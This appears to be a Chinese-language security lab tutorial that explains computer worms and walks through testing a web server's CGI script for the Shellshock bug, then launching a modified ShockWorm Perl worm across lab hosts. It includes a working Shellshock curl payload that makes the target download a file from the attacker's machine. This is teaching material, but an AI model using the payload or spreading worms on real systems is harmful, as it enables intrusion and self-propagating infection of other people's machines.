破壳漏洞的原理与利用
蠕虫简介
蠕虫定义:一种能够利用系统漏洞通过网络进行自我传播的恶意程序。它不需要附着在其他程序上,而是独立存在的。当形成规模、传播速度过快时会极大地消耗网络资源导致大面积网络拥塞甚至瘫痪。
计算机蠕虫与计算机病毒相似,是一种能够自我复制的计算机程序。
与计算机病毒不同的是,计算机蠕虫不需要附在别的程序内,可能不用使用者介入操作也能自我复制或执行。它是直接在主机之间的内存中进行传播的。计算机蠕虫未必会直接破坏被感染的系统,却几乎都对网络有害。计算机蠕虫可能会执行垃圾代码以发动分散式阻断服务攻击,令计算机的执行效率极大程度降低,从而影响计算机的正常使用;可能会损毁或修改目标计算机的档案;亦可能只是浪费带宽。(恶意的)计算机蠕虫可根据其目的分成2类:
一类是面对大规模计算机网络发动拒绝服务的计算机蠕虫。
另一类是针对个人用户的执行大量垃圾代码的计算机蠕虫。
本次实验蠕虫简介
本次实验使用的蠕虫,是根据github上名为ShockWorm的蠕虫(项目地址:https:///matlink/ShockWorm/blob/master/shellshock.pl)改编而成。改动有以下几点:
1.原蠕虫只感染一台主机,本实验蠕虫扩大了范围,使其真正拥有了蠕动性,可以自行传播(限制了蠕动范围)。
2.原蠕虫在感染主机后会修改系统文件,并且截获执行sudo命令时输入的口令。本实验蠕虫删除了此功能,在感染与完成传播之后,仅执行sleep操作。
实验目的
1)通过该实验了解蠕虫的基本特征
2)掌握蠕虫的传播方式及使用方法
3)能够改进蠕虫的功能
实验环境
蠕虫发起者:centos6.5,IP地址:10.1.1.231
Worm1:centos6.5(web服务器),1号被感染主机,IP地址:10.1.1.12
Worm2:centos6.5(web服务器),2号被感染主机 ,IP地址10.1.1.x(x随机)
本实验分为三个任务:
任务一:判断10.1.1.12主机web服务的test.cgi是否存在破壳漏洞;
任务二:蠕虫发起者执行蠕虫程序,感染1号主机Worm1;
任务三:观察Worm1主机蠕虫的传播过程,检查Worm2主机是否被感染。
任务描述:判断10.1.1.12主机web服务的test.cgi是否存在破壳漏洞
1.使用ssh登录蠕虫发起者主机(10.1.1.231),执行下面三条命令。命令执行结果如下图所示。
[root@worm-master ~]# tail /var/log/httpd/access_log
查看日志
[root@worm-master ~]# curl -A “() { :; }; /usr/bin/wget http://10.1.1.231/shock” http://10.1.1.12/test.cgi
[root@worm-master ~]# tail /var/log/httpd/access_log
2.继续在10.1.1.231上执行下面的命令,可以找到蠕虫程序。
[root@worm-master shockworm]# cd /root/shockworm/
[root@worm-master shockworm]# ls
Shellshock.pl
3.登录worm1,查看/tmp目录。
[root@worm-test1 tmp]# ls -al
4.继续返回10.1.1.231主机,执行下面的命令,来运行蠕虫程序。
[root@worm-master shockworm]# perl shellshock.pl
5.登录Worm1,执行下面的命令,观察被感染的特征。
[root@worm-test1 tmp]# ls -al
已经感染了
过一会看看worm3也感染了
